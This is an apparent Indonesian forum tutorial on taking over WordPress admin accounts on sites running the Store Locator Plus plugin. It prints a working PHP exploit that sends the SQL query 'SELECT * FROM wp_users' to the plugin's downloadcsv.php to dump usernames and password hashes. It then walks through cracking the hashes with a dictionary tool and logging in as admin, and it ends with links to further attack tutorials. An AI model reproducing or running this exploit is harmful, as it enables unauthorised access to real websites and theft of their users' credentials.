hack wordpress yang menggunakan Plugins – Google Maps via Store Locator Plus dengan memanfaatkan celah Blind SQL Injection

Pada tutorial saat ini penulis akan membahas tentang cara Hacking password login wordpress yang menggunakan Plugins – Google Maps via Store Locator Plus dengan memanfaatkan celah Blind SQL Injection.

Plugin ini didasarkan dari situs penyedianya di [You must be registered and logged in to see this link.] fiturnya sebagai berikut :

You can use it for a variety of countries, as supported by Google Maps.
The Store Pages add-on allows you to connect each of your locations with a WordPress page — so you can add hours, images and more!
Supports international languages and character sets.
Allows you to use unique map icons or your own custom map icons.
Change default map settings via the admin panel including:
Map type (terrain, satellite, street, etc.)
Inset map show/hide
Starting zoom level
You can use miles or kilometers
Pulldown list of cities and/or countries on search form can be toggled on/off.
Bulk upload your locations via the CSV loader.
Location search tracking and reporting, find out what your visitors are looking for.
Popup email form.

Plugin ini cukup populer, berikut ratingnya.

[You must be registered and logged in to see this image.]

Penulis menggunakan exploit yang dibuat oleh Sammy FORGIT – sam at opensyscom dot fr -http://www.opensyscom.fr.

Sebagai berikut exploitnya :

<?php

$ch =
curl_init(“http://www.exemple.com/wordpress/wp-content/plugins/store-locator-le/downloadcsv.php”);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array(‘query’=>”SELECT * FROM wp_users”,
‘filename’=>’test’,
‘all’=>’true’));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print “$postResult”;

?>

Simpan source code tersebut dengan ekstensi php ke 1 folder dengan program php.exe dari webserver apache. Disini penulis menyimpannya dengan nama wppasnow.php.

Untuk melakukan exploitasinya sebagai berikut :

[You must be registered and logged in to see this image.]

Username dan password dalam bentuk hash sudah didapat, tinggal kita pecahkan password tersebut dengan WordPress PasswordHash Attack Tool yang dapat di download di [You must be registered and logged in to see this link.] untuk dictionary filenya dapat membuat sendiri atau dicari disitus-situs hacking.

Cara ini seperti di tulisan artikel saya sebelumnya yang berjudul Hacking SQL Injection manual pada WordPress dengan permasalahan pada suatu plugin di [You must be registered and logged in to see this link.]

Penulis langsung saja mencoba, ganti nilai varibel $hasP sebelumnya dengan password wordpress dalam bentuk hash yang kita dapat dari exploit yang telah dilakukan. Ganti juga nama file dictionary untuk brute dengan file dictionary milik anda.

Untuk di tempat penulis sebagai berikut :

[You must be registered and logged in to see this image.]

Setelah itu tinggal di simpan lalu dijalankan seperti berikut :

[You must be registered and logged in to see this image.]

Binggo, password telah didapat. Setelah password di temukan maka tinggal login admin wordpress untuk masuk ke halaman admin wordpress.

Oleh Kurniawan

Ijin belajar thanks hack wordpress yang menggunakan Plugins – Google Maps via Store Locator Plus dengan memanfaatkan celah Blind SQL Injection 3529815765

hack wordpress yang menggunakan Plugins – Google Maps via Store Locator Plus dengan memanfaatkan celah Blind SQL Injection 3529815765

» Hack WordPress yang menggunakan plugin Omni Secure Files Plugin 0.1.13 dengan memanfaatkan celah Arbitrary File Upload
» Cara melakukan serangan denial of service pada Tftpd32 dengan memanfaatkan celah pada DNS Server
» Threaded Mode | Linear Mode WordPress SendIt plugin 1.5.9 Blind SQL Injection Vulnerability
» langkah - langkah memasang Gooole Search Engine pada blog atau website yang menggunakan CMS Wordpress.
» backup & restore data dengan menggunakan EASEUS Todo Backup semoga bermaanfaat yang satu ini